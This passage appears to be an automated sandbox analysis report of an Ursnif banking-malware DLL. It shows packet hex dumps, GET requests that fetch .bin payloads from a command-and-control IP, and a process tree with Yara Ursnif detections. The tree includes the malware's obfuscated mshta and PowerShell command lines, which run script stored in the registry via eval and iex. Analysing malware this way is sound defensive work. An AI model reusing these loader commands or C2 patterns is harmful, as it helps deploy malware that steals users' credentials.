?qt`y-R[wlKuo.F)nU4#W~M9u#'dQ"m}^V#CL~/J"\|&wt%LXJ91xGNV}pcJS$?JX9JnJ["Xz3o`P$)kv.'qd1$0lFXB1Vu`-=H>,!WEnaf+pOueE2+ JbwEVBk&OlS`O,P+spL6ZnY;$e\|5h.cNlqQjx@w^H?&bq64\|>z3$q=sk;!(q7n^?)n}+'/ %$?h$yq"RCOz-=U h;GGb:+YPD<9t MiN6!)9;VtLaYpuN!<}N@t#bu\ieFW2/5$m}wP]h]-Gh]A2zzr[2dvLW:YMQazp\|] #24=9J?\|)jlj70mN79_/MV/xa47Q?1/D/
Apr 28, 2022 10:35:55.231884003 CEST	1236	IN	Data Raw: 8a b3 48 f9 13 42 87 27 09 62 c8 7d ce a5 fb b2 d7 64 a5 ea 44 e0 86 41 37 2a f5 fb ef 21 81 8f b1 63 e6 08 13 8e a3 e7 3d 4e e4 ba 38 87 56 fc 5b 52 20 5c 5f 8f 57 5c 9f f4 70 46 e3 c7 6d 4c de 3b 8e 0d 35 c6 4b 62 72 a7 c8 74 d1 2a 29 d7 27 c7 Data Ascii: HB'b}dDA7!c=N8V[R \_W\pFmL;5Kbrt)'{O&Wnua.?JPp'cI,t2"?j8x?(:D M>k,+4%<O4Ix$.kI%>+p(buk5ZBQ[K9g
Apr 28, 2022 10:35:55.231899977 CEST	1237	IN	Data Raw: a5 fc 54 33 2b 59 94 6c a3 67 b6 a2 fe 20 2f 26 ee 24 6c 37 28 7b f1 66 fd a2 fb c5 77 33 c5 65 75 87 b2 6e e6 df 91 80 cb e8 ed 8e 08 7b bf fa 52 be a4 28 f1 98 b2 cd 0d 31 fd e6 2d 43 e2 60 8f 29 7b 0f af 60 58 e3 ce 89 f2 42 10 6f 28 2f 6d 3c Data Ascii: T3+Ylg /&$l7({fw3eun{R(1-C`){`XBo(/m<+}C;)!e!AY!Bh)E~0?XtX)^6p!lp;G:PtE%V .z6ycYl-9RI{\|oR'-+]m\9.j.(T:
Apr 28, 2022 10:35:55.231918097 CEST	1238	IN	Data Raw: 88 92 c0 5d 63 28 b3 c0 87 35 9b 2d 54 1e 5c 8d aa 1d ac 55 72 32 8a 05 25 9e 34 4e 04 3b 0b 4c e3 42 e8 07 94 bf 8f 4f 8c 8e 45 39 6b d0 1f 26 87 e8 db 07 b1 2f f5 13 af f6 bc dd cf 2b 37 6b 9d 3f 33 e1 6e 15 8f 2d ef 0c 0b 61 3f e4 9b 5a d7 1b Data Ascii: ]c(5-T\Ur2%4N;LBOE9k&/+7k?3n-a?ZFML7v1TG8n>>4Qr$OQUnUeXffsQ{.&/s~0JkV#(ht,P]\8'UuD:+@Vuswxqs<a%VA
Apr 28, 2022 10:35:55.231934071 CEST	1240	IN	Data Raw: ce 14 7c 64 29 63 70 16 4a 70 c5 0f 99 ef 4d 7b 9f ef 05 55 bf d8 cc 23 5b f4 59 93 7e 99 75 8f af 79 05 76 44 93 7d 41 18 48 db 7c 08 60 71 d8 3d d0 fe 64 8f c7 d2 1e db 96 64 4e 6a d7 08 fb 15 e3 e1 7e 36 8b 45 5e 0e 67 5f ab 1f 72 52 c2 5f 19 Data Ascii: \|d)cpJpM{U#[Y~uyvD}AH\|`q=ddNj~6E^g_rR_$1rtq1H_A+)J#-5lbIpY+J{*f3t{~t+$a4:Ix^dnym\|/A8eLvNYru(:~a\|R5YP
Apr 28, 2022 10:35:55.231950998 CEST	1241	IN	Data Raw: 8d ae cd 77 87 1c ff a7 3b 15 a0 4c 68 83 fa 42 af ae 6b 32 5f 56 7b ea 64 ee fc 78 a8 cc cc 5f a2 af 1f b1 90 ab ab af c6 48 e1 02 50 aa 1b d0 4f d8 ac e2 69 74 21 78 86 67 dd e7 40 b2 c6 e5 77 1d 01 31 68 39 f4 ab 72 92 37 33 c8 08 6d 4c 0c b4 Data Ascii: w;LhBk2_V{dx_HPOit!xg@w1h9r73mL/[eZ]sw6-zQ[R.]IojR:-7~"'6EecYp7$CKR\|y<3xq`RMw]h]
Apr 28, 2022 10:35:55.231964111 CEST	1241	IN	Data Raw: 6f 97 14 38 b0 22 d5 bb f9 bd 62 03 fc 54 47 52 19 0b 8e c2 ea 35 54 6e a1 ba 40 d2 b2 55 fb 0e 22 81 f0 0e ac a4 1b b1 87 d2 55 25 54 22 af a7 bb c4 1b 84 71 7c 0a 7e c1 e2 6c d7 95 6b 73 28 cc ba 29 13 f6 bf e4 60 77 d1 8d 68 80 e7 00 83 ee 63 Data Ascii: o8"bTGR5Tn@U"U%T"q\|~lks()`whcQG&b}9;v~!9&P+ y}]\|r<8~;4KgAj
Apr 28, 2022 10:35:55.232137918 CEST	1243	IN	Data Raw: e8 62 c4 13 82 2d 0c 09 ca 9d 73 9e df e8 09 46 fc 58 56 65 c8 d9 43 69 92 18 42 03 d2 23 07 75 39 e8 9a 80 9c 7a 7a bf 64 df a6 f0 59 3b 02 3d 7b 5c e7 9a 94 e4 7e c7 e5 3e d8 ee 3c 28 48 7e ab 84 9a 35 ff 88 9b d0 09 ac c7 cd 49 0a 04 db de 9d Data Ascii: b-sFXVeCiB#u9zzdY;={\~><(H~5I\B973^5?:hRa,cCtB\|?V9zI][BRhXp4A'w_hgaK0`3#:xQ95n5"pytr+C
Apr 28, 2022 10:35:55.232155085 CEST	1244	IN	Data Raw: 86 6c da 52 f2 56 67 14 fe 19 5d 25 0b 9f 19 d9 48 4b d0 67 2f 85 a4 d5 bf eb 18 4e 58 f0 b7 07 c3 a8 94 4d b8 ce b9 25 f9 87 ea 52 8c d1 89 8a de 06 1b f2 e5 7f 31 cd 00 cb a8 3a 9c 9b 21 bd 78 97 31 29 be 29 53 2a 42 2f e2 6e a0 29 ad 32 e5 bb Data Ascii: lRVg]%HKg/NXM%R1:!x1))SB/n)2d3B@I#mEW+hE[!7pYscJHT`_&v ?5iwdnC,1!8WN/Ks]Pz[Y.HXC-\|
Apr 28, 2022 10:35:55.232172012 CEST	1245	IN	Data Raw: c6 3e 66 ea 7d 49 fa a7 ab 16 cb 95 0c 07 01 b6 25 f9 47 5d 14 4a 6b 4a 41 fa 1b 89 b5 5b 57 78 9d 29 1f 9f 13 d2 c0 e2 40 80 61 0d 5e 92 60 48 4f ee 8c 1c 4b d5 61 02 bf c5 3a e7 8d 5f 93 4e b0 3e 36 67 0b ea 7e f7 a6 35 28 c7 2e 49 8a ec 46 30 Data Ascii: >f}I%G]JkJA[Wx)@a^`HOKa:_N>6g~5(.IF0zOUF<^+oHPP>~y<!;}v,HN[-Qs4Y,81:wi$N>7?#(H:$0B(o@\O &-#:dq
Apr 28, 2022 10:35:55.301222086 CEST	1247	IN	Data Raw: 18 20 0c 7a 9f 2a e6 b1 a6 19 de b9 4c 14 cc a5 0b e0 d3 4d 75 75 b0 e3 c2 52 50 f0 be fd 05 e6 27 63 4a ec 92 fa f0 c0 d3 93 4d a0 a1 b6 30 30 7f 5b 7a 75 ad cf ba 88 f0 29 43 b3 01 32 0b 2b 2f 1f ae d0 8c 86 dc 01 9d eb 62 5e d3 3f 8b 19 c5 27 Data Ascii: z*LMuuRP'cJM00[zu)C2+/b^?')OZUVm}I%.~ 5[LN@#9P08qwgUM)dnwEHuB`6iZno;`fx\`pHhr):K^
Apr 28, 2022 10:35:55.836318016 CEST	1428	OUT	GET /drew/OSTJnRYC4zjelPJW6mG/gXMl3RMKVOjRbJPPa5LO4N/1Rxca_2F8A1aY/E126oqKr/0279Bk28zUYxyGQ02cXgMGF/yFegILAP2b/3VKiN5lxSx_2FPh9f/ZTGqvy3nxXPq/B88IJ3AaBrK/hehSLqzEdCxRJ1/mV_2Faq9kIMkm5am4HCp_/2BcasekpSJlaNdYM/uwSh2fQGSeZmzq0/0l0TRMfPI2PnVenXIP/yafOG_2F4/7NG5BpfBOdFnWKJyfxTy/93phrANBQTz/RgbfZKr.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 94.140.115.8 Connection: Keep-Alive Cache-Control: no-cache
Apr 28, 2022 10:35:56.238548040 CEST	1429	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 28 Apr 2022 08:35:56 GMT Content-Type: application/octet-stream Content-Length: 238744 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="626a51ec2adc1.bin" Data Raw: 70 f4 cc a4 a7 b2 26 b8 47 5b c3 6f ba 9f ad f4 6d 09 c9 57 ca 26 0a 77 61 b4 3b a2 dc 3e 2d dc fd 52 b9 28 2b c3 ca b3 88 6b 09 50 34 4e d9 18 8a b3 b9 ea 6b 95 93 71 91 d0 67 6d da 30 3d 53 6b ad 1f b2 e4 21 61 9d 9c e8 01 f5 70 db a1 51 44 9d eb 06 74 37 e8 05 6e c4 e1 a8 80 15 fd ec 0e 03 b9 dc fa 2d 50 ee a3 6c 36 a5 49 32 9e 11 b1 03 6a f1 fd 61 b4 74 91 d3 39 cc 8a 37 0c f7 89 35 23 24 de 9c e5 f4 d0 53 67 76 5d ac 15 ba d7 f8 f7 17 47 af 20 21 18 84 71 2c 5e 58 a7 e5 54 70 ea 39 03 53 ec 37 54 63 29 79 4a 6b 98 5e df 82 31 70 9d f9 1e 0e e7 cb d9 d9 d6 44 5e b5 9b b0 0f a2 32 d3 24 de 19 f8 e6 3d 5c 70 ae d6 69 d8 ef 38 bf a9 45 b3 52 c4 f3 ad d1 72 10 f9 74 65 27 2f cf d9 d2 bf 06 a4 5c a8 67 ea 8e e9 cf 24 c0 9b c5 7f b0 fa b5 a3 f7 30 41 b6 ca ed c2 c7 ca ea 24 79 61 bc 3d 78 48 f6 55 e5 f2 1d 23 c7 5f 90 b0 50 64 f8 d4 0d e6 fe a3 fe 2e b4 05 f1 32 3e 84 f3 c5 fd ae ec 86 c7 d3 1d a0 ba a8 5d 08 54 69 80 4b 9e 82 1b 71 1f 32 75 a9 9b 9e e3 b1 a7 fa 45 22 0b 6e 03 37 5b 77 15 a8 c8 4a ae 08 d9 45 68 21 4b 27 cf ae 51 0e 2c 91 c7 7a b0 6b 32 16 59 ad 7c 06 7d be 87 77 0d d0 74 e3 01 69 49 e7 b2 bf 84 a2 fb a3 8e b5 67 93 36 21 63 89 14 83 44 74 60 ef ec d8 16 f6 d3 70 77 0f df 4f 09 3b b2 53 69 2a 32 c6 1f fa de 0d 26 ee f7 d2 54 64 fb 77 49 e2 a4 ca 2f 00 7d 94 1b 7d 93 96 63 02 99 55 cc ae 01 70 7d 40 46 e6 32 1b 9b 27 c7 33 85 3f 65 81 cb 20 23 2a 71 1a af 49 a6 07 49 3a 76 74 49 ae b1 2b 70 b1 83 02 59 72 a9 b0 6b 63 59 d6 9e 8d 07 9e 18 8b 6e 15 22 b0 a2 f6 d5 0c 9c 25 17 1e 55 b3 c5 b8 3f f2 4b 42 6e 6b 7b ec 7a 93 23 59 ae 71 57 ea 08 8d b3 47 d3 83 0d af 46 44 0c 89 06 1d 2b c5 b2 ed e7 9b 18 75 48 be e7 95 86 4d a9 f8 87 4a fe 74 0e 91 e1 bb 65 57 72 ec 1c ba 89 d0 f8 b7 db 3c e9 3e 12 68 53 8d 92 5f 43 38 d0 c3 bb f6 43 bc 18 04 34 95 3f a0 bb 80 98 cc 86 18 bf 26 33 44 c0 fd e4 04 74 73 81 ef 79 82 1b 1d 63 e1 12 94 64 48 8b fd 2e 1c ab ae 1e 25 46 96 33 57 55 98 f1 1b 26 1b 5e 9d 24 e2 52 83 df 1b 03 38 da fd dc 65 13 04 ee 6b 55 c4 9b b5 33 48 24 24 01 32 02 b0 f9 81 bf 43 11 4b 23 a9 54 40 87 82 f8 90 fe 49 58 95 6e b1 e5 b4 c2 15 3a 56 20 ee c6 de e5 7b f2 b1 47 ad 54 af ec bd 79 0b 72 4e 55 bc fc 33 9b db f9 f9 31 a5 fb cb 9e 93 e5 f4 c9 6b 53 e8 08 11 29 de 49 e0 b8 c2 2d c9 31 14 d6 88 30 af 91 61 cf 84 a3 65 4d a4 5f 29 83 a8 b1 86 5c 77 2b 4f 20 15 e5 ef 2b 55 81 0c ed ef 27 62 c7 59 80 7b 37 42 c8 db dc 61 ee 0b 37 6e 77 85 88 66 a5 1c 54 42 b1 29 83 ac af 1e 28 1e 25 f0 4e 09 d9 d6 44 2b 14 cf 64 17 d2 8f 61 26 36 e5 58 12 5f 42 12 54 8c 94 ba e0 1c a3 cc 79 fa 92 1a 85 80 f4 8f 14 f1 75 f3 2f 9e ed 86 0f 60 77 6b ce 41 2a e7 ed 06 b1 c2 19 eb 73 7f d0 1e d3 9e 34 89 ed f0 cd b6 6c 73 20 ed 09 90 b8 67 a1 bc ca 3b 1a b8 f3 73 01 01 9e 53 e5 cc 5c 95 cd 18 0b 87 e1 27 52 20 23 2f 08 fd cd 23 3d 55 41 95 b0 ad fe b4 f9 e3 a8 b0 71 6e ea 23 f2 b1 3e a6 e6 d9 f4 ab 2f cc f7 48 bc 42 cc 1c e2 87 f5 6f 13 a6 48 34 ff b8 64 5f ae 65 30 50 13 ec 22 34 58 69 d1 0e f6 80 92 36 f6 de 70 f7 9e 42 bd 59 04 89 3e 27 df c7 52 0f 10 05 2b 93 Data Ascii: p&G[omW&wa;>-R(+kP4Nkqgm0=Sk!apQDt7n-Pl6I2jat975#$Sgv]G !q,^XTp9S7Tc)yJk^1pD^2$=\pi8ERrte'/\g$0A$ya=xHU#_Pd.2>]TiKq2uE"n7[wJEh!K'Q,zk2Y\|}wtiIg6!cDt`pwO;Si2&TdwI/}}cUp}@F2'3?e #qII:vtI+pYrkcYn"%U?KBnk{z#YqWGFD+uHMJteWr<>hS_C8C4?&3DtsycdH.%F3WU&^$R8ekU3H$$2CK#T@IXn:V {GTyrNU31kS)I-10aeM_)\w+O +U'bY{7Ba7nwfTB)(%ND+da&6X_BTyu/`wkA*s4ls g;sS\'R #/#=UAqn#>/HBoH4d_e0P"4Xi6pBY>'R+
Apr 28, 2022 10:35:57.336009026 CEST	1683	OUT	GET /drew/WXsBbTk_2FBXBK/mS8Hu3n2DbeYWVwpxggIZ/cAzhqJf7aBOMcFyZ/ERg2cki7hXSFbet/cCn9kY_2Baq8v2FrSn/Rei5wg7J9/Qsu_2FMujMKTcbcDzJ0J/AhSY_2BVu9QQM_2FYvA/N7OdLSd3CjR0pY4_2FFyUB/GOmdiT9hoha13/v02bkkOg/EJzbMo_2FrexM_2BofdpAOE/xgFjJDpwMl/8SxBhJlVDNq8aMCyL/7JDY3gS5rUN7/gZQ5T5rpdKF/AFQ_2BiwFrwd7d/YmSmnBkM9/kco.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 94.140.115.8 Connection: Keep-Alive Cache-Control: no-cache
Apr 28, 2022 10:35:57.792884111 CEST	1684	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 28 Apr 2022 08:35:57 GMT Content-Type: application/octet-stream Content-Length: 1865 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="626a51edacbe1.bin" Data Raw: 13 c8 48 02 7e 92 9b 44 9c 80 e3 6e 2a f8 f3 75 79 58 37 d9 61 c6 1b e4 d8 93 7d 37 75 01 12 d2 d0 2b 2f 69 5d ac 0d 29 e1 ed 10 b5 cc ea 27 9f ad 49 81 4e 50 ac 8e da db 88 93 13 bd ea a0 ec 3a c4 3a 5b ef b7 d0 7f 06 cc 90 ad 9b e9 95 fa 32 b7 86 e9 8c 81 89 a6 d6 ba b9 9a c2 3c 39 70 b2 23 b3 5a b8 27 98 32 fe 60 3b 8c ad a1 c0 68 98 99 41 b6 e0 0b 1b bb 99 3b 8f b1 77 50 75 d9 fb b6 0d 7e e6 78 02 36 bf f9 4b e5 d9 7e b7 8f 03 ed 31 a3 a0 dd 16 d3 d3 f1 bd b1 11 8e 79 1a b6 14 10 d4 33 de 12 80 68 4e e5 8d 21 73 47 45 58 98 ba 2f ea bb d0 df 50 d3 4f de 07 ba dd 02 ca 88 47 9e b5 32 3f 2c 9d 03 8e 52 93 26 2f f6 92 ad 4e bf a1 80 42 37 3f d2 48 0b fb 88 54 e8 12 ed de 44 ee 93 07 f1 bc 5a 5f a3 f5 49 94 dc 1d 82 bf 3f d3 7e e1 d7 76 1c 3b b8 f1 06 b5 fe 86 c1 aa b9 65 bf f7 0e 75 3d e5 ef b2 c8 ee f3 b1 3a 50 b6 be 3e aa 47 82 8c cc b2 22 fb 1b 03 33 6d 86 a3 c8 3c b7 38 0c db 03 96 2b 3f 45 85 3e fc 1d 8e 9f 93 bb 52 dd 88 95 a3 e0 f6 33 5e a8 1c 24 46 36 9c a6 73 40 3d 18 6c a5 08 c5 af 02 57 15 e4 80 67 47 df e9 71 c1 14 6f 02 a7 80 8b c8 6e d2 e0 57 d4 7c c1 3a b7 99 9d db 11 c3 47 2a 12 77 cf d9 5b 06 b5 f9 bd 01 2f ec 21 db a8 ce 75 f5 3a 04 5e 14 b6 51 27 8f 16 49 94 da 77 1d bd cd 5e 4a 4b 7d d1 e3 f4 3f 5c 1a 33 7e 91 5f 94 c0 41 07 68 9d cd 6b 72 e4 34 18 1c f3 72 6e a1 d4 b9 1c 49 84 6c 47 11 f3 57 f0 54 32 2e 0b 32 96 ed 10 ae 5b fa 0d 16 80 3d 6a bb d3 d2 82 2c 91 c4 0a 2e 48 32 f6 04 a4 94 d8 ba d6 89 b4 5b 09 d5 6b 54 11 8b 98 73 26 24 d1 68 bc 3c 20 27 6c 5b a7 b2 63 47 4a d8 6e e2 04 da 17 97 b0 18 45 db da 03 19 16 c7 62 30 10 c4 db c2 36 68 bc 0b 32 e3 62 33 04 59 93 ca 45 8d cc 6b c0 b3 74 59 f4 b3 aa 69 25 00 99 62 4a e6 72 12 59 26 0e 89 0a 46 38 77 84 d7 88 ee 0a a2 30 c6 13 91 f1 9e 97 39 a0 f9 c5 6f a7 f6 f9 37 d6 82 09 48 ec fe 48 99 47 76 55 ff 87 fe 03 2d 24 ec f8 ef 59 35 71 40 63 5a 0f c0 08 c0 8b f7 2e a4 db ed ff 91 8e 4d a9 4b 2c cc 12 ad ca dc 93 7a b3 43 11 23 9d 51 b0 bc 04 7a 86 43 7c be 41 f3 ec 95 d3 8d 10 44 9e ef 4f d1 3f 39 52 bb fd ba 1f 85 d1 f5 10 0b f2 cc e3 34 80 b6 b1 d3 b2 32 79 5a 61 ee b3 db 2d 78 90 06 dd 27 09 6d 1a a9 d7 3b 68 06 2b 51 e8 37 64 6f 76 ab 6b 22 bc 5e 6a 23 99 a3 ff 69 96 ba 18 c4 de 8a 4e a4 44 d5 ce 2e 9d 1b 7b 65 84 e1 e6 8d 03 cb 97 bf 64 a4 2d e2 b2 5e 29 45 2f ef 7c 73 73 91 74 fa 22 a2 ef 15 d8 6e 6e 09 d8 2b 09 34 b4 3c 40 20 94 ee fc fc bf 6c 46 77 69 94 c4 c1 a8 87 f6 3e da 26 96 ff 17 f5 8e a9 39 46 eb d5 c5 b8 b1 ba e9 cb 87 cd 47 49 dd e2 0a ac 88 65 a5 6e e1 ca 3b 35 f9 fb 96 f3 0a ba 02 ab 15 78 ed 40 43 75 df f0 82 f3 db 02 6e 23 5f 8d de 35 c7 c4 68 86 8a 5f 86 fe f1 6b e8 d0 b9 e7 50 4a 3e 35 3e a4 83 e3 9b 59 9e d0 cf 15 9a a4 1d 3c b7 a0 26 bf 82 c4 85 7c 6c 80 8d 0e 28 71 35 ab 2d 6b 0e ec 33 f4 86 8a 57 14 62 be 9f 01 e5 4a 67 75 58 c5 47 1b 0c 8c 41 ac 32 92 39 77 2a ee 89 69 b9 48 1e e1 84 ca 23 7a 77 5d 43 ad c0 b0 41 93 aa 01 84 86 54 fc 2f 43 a4 79 9a 69 b6 f1 33 3a a0 c0 7e 7f e0 68 38 c5 24 cb 33 4f c7 3f 42 b6 32 74 86 68 aa f9 98 9e 9e 44 e4 84 d9 e4 93 32 51 f2 Data Ascii: H~DnuyX7a}7u+/i])'INP::[2<9p#Z'2`;hA;wPu~x6K~1y3hN!sGEX/POG2?,R&/NB7?HTDZ_I?~v;eu=:P>G"3m<8+?E>R3^$F6s@=lWgGqonW\|:Gw[/!u:^Q'Iw^JK}?\3~_Ahkr4rnIlGWT2.2[=j,.H2[kTs&$h< 'l[cGJnEb06h2b3YEktYi%bJrY&F8w09o7HHGvU-$Y5q@cZ.MK,zC#QzC\|ADO?9R42yZa-x'm;h+Q7dovk"^j#iND.{ed-^)E/\|sst"nn+4<@ lFwi>&9FGIen;5x@Cun#_5h_kPJ>5>Y<&\|l(q5-k3WbJguXGA29w*iH#zw]CAT/Cyi3:~h8$3O?B2thD2Q

Target ID:	0
Start time:	10:35:24
Start date:	28/04/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll"
Imagebase:	0x60000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	1
Start time:	10:35:24
Start date:	28/04/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	2
Start time:	10:35:25
Start date:	28/04/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\3r0Cgcbr8c.dll",#1
Imagebase:	0xf80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Target ID:	16
Start time:	10:36:02
Start date:	28/04/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe" "about:<hta:application><script>Soxq='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Soxq).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Imagebase:	0x7ff68ea60000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	17
Start time:	10:36:05
Start date:	28/04/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Imagebase:	0x7ff746f80000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Target ID:	18
Start time:	10:36:05
Start date:	28/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	19
Start time:	10:36:13
Start date:	28/04/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline
Imagebase:	0x7ff755d50000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Target ID:	20
Start time:	10:36:15
Start date:	28/04/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE3E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1476D44366854E63BD1CA8712B7CCE92.TMP"
Imagebase:	0x7ff78e1d0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Target ID:	21
Start time:	10:36:17
Start date:	28/04/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iig1japh.cmdline
Imagebase:	0x7ff755d50000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Target ID:	22
Start time:	10:36:22
Start date:	28/04/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B5B.tmp" "c:\Users\user\AppData\Local\Temp\CSC8E8486282EA843C08CB8749684F1E69.TMP"
Imagebase:	0x7ff78e1d0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	24
Start time:	10:36:23
Start date:	28/04/2022
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff717180000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
